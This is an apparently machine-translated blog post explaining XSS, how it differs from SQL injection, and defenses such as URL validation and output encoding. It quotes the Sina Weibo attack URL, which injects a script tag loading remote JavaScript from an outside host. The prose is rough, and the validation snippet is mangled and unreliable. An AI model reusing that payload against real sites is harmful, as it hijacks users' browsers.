Studied http://www.oschina.net/question/565065_57506.
(Reproduced here http://blog.csdn.net/stilling2006/article/details/8526498)
Cross-site scripting (XSS), a computer security vulnerability that often appears in Web applications, allows malicious Web users to embed code into pages that are available to other users. For example, pages that include HTML code and client-side scripting. For non-aliasing with cascading style sheets (CSS) abbreviations, cross-site scripting is typically abbreviated as XSS.
SQL injection is a database that injects malicious code, executes the SQL statement, and finally returns the corresponding data, so SQL injection is in the database.
XSS, by sending malicious code to the service, allows the server to send malicious code to other users ' browsers, and finally hijack the user 's browser, so that XSS acts on the user .
There are two main ways of attacking XSS:
Like a SQL injection attack, I inject a script to the server, the user accesses a URL of the method server, this URL will be the remote JS injected into, this JS may automatically do a lot of things.
For example, this incident to help you tweet, to help you send messages in the station and so on. There are many ways to inject, such as: Submit a form, change URL parameters, upload images, set up signatures, and so on. The other is the attack from the outside, mainly refers to the construction of the XSS cross-Site Vulnerability Web page or to find a non-target outside the Web site has a cross-site vulnerability. such as when we want to penetrate a site,
We construct a cross-site Web page on our own server,
Then, by combining other techniques, such as social engineering, the administrator of the target server is tricked into opening.
The threat of this type of attack is relatively low, at least Ajax is very difficult to initiate cross-site calls (you may need to hack the browser).
Through the above example we find that XSS attacks and SQL injection have the same point, they are attacked by injecting malicious code, the difference is that they attack objects are different.
XSS is the hijacking of a user's browser by injecting malicious code, such as JavaScript, VBScript, ActiveX, HTML, or Flash, in order to construct a malicious URL.
Constructing a malicious URL means:
Many Web page element stitching is made up of URL parameters. If you maliciously tamper with the parameters, some script will be mixed in the page to send to the user. When the user opens, these JS scripts run. You can change the URL, send these URLs to the user, let the user click. Users see the host is a large web site is not vigilant, but mistakenly let these JS script to be executed.
The following JS can implement the URL verification:
var url = request.querystring["url"]; if (! string. IsNullOrEmpty (URL)) { this. Litleavingtag.text = regex.ismatch (URL, @"\w+:\/{2}[\d\ w-]+ (\.[ \d\w-]+) * (?:(?: \ /[^\s/]*)) * ")? String. Format ("<a href={0} >examplejob</a>", URL): "The URL is invalid." ;}
Above this regular, I also have a bit, did not see, especially why need Two "(?:"). For regular grammar and learning, refer to one of my other reproduced articles:
Http://www.cnblogs.com/charlesblc/p/5990322.html
HTML encoded output:
Another essential XSS defense strategy is the output encoding method, which ensures that every character in a string is rendered in the correct form. For example, in order to correctly render text such as "<", ">", or spaces in the browser,
We need to encode it, otherwise the browser will perform its function based on these feature text, rather than rendering it correctly on the page. Our common HTML codes are: ,<,>, ", and so on.
Non-HTML encoded output:
When we display the HTML encoded text through the message prompt box, the text is displayed in the encoded form without decoding, but the first reaction of the user to see them is that our program is garbled and problematic,
In fact, we know that we have not yet decoded, so in some non-HTML encoding we have to decode the first processing
Sina Weibo XSS attack event
I think we have a vivid memory of Sina Weibo's XSS attack! It uses a URL from the microblogging Plaza page Http://weibo.com/pub/star to inject a JS script,
Then, with the HTTP://163.FM/PXZHOXN Short link Service, point the link to: > > >http://weibo.com/pub/star/<script src=//www.2kt.cn/ images/t.js></script>link:http://weibo.com/pub/star/%3cscript%20src=//www.2kt.cn/images/t.js%3e%3c/ script%3e URL encoding after display: Http://weibo.com/pub/star/g/xyyyd%22%3E%3Cscript%20src=//www.2kt.cn/images/t.js%3E %3c/script%3e?type=update through the above example, we found that the above XSS attacks are not so mysterious.
Summarize
XSS attacks as one of the biggest threats to web business, it has committed various crimes such as the XSS attacks on Sina Weibo, which not only harms the web business itself, but also has a direct impact on users accessing the web business.
How to defend and prevent XSS attacks, to protect the business security of the Web site, this burden has fallen on every developer.
Cyber Attack II: XSS (one is SQL injection, previous articles)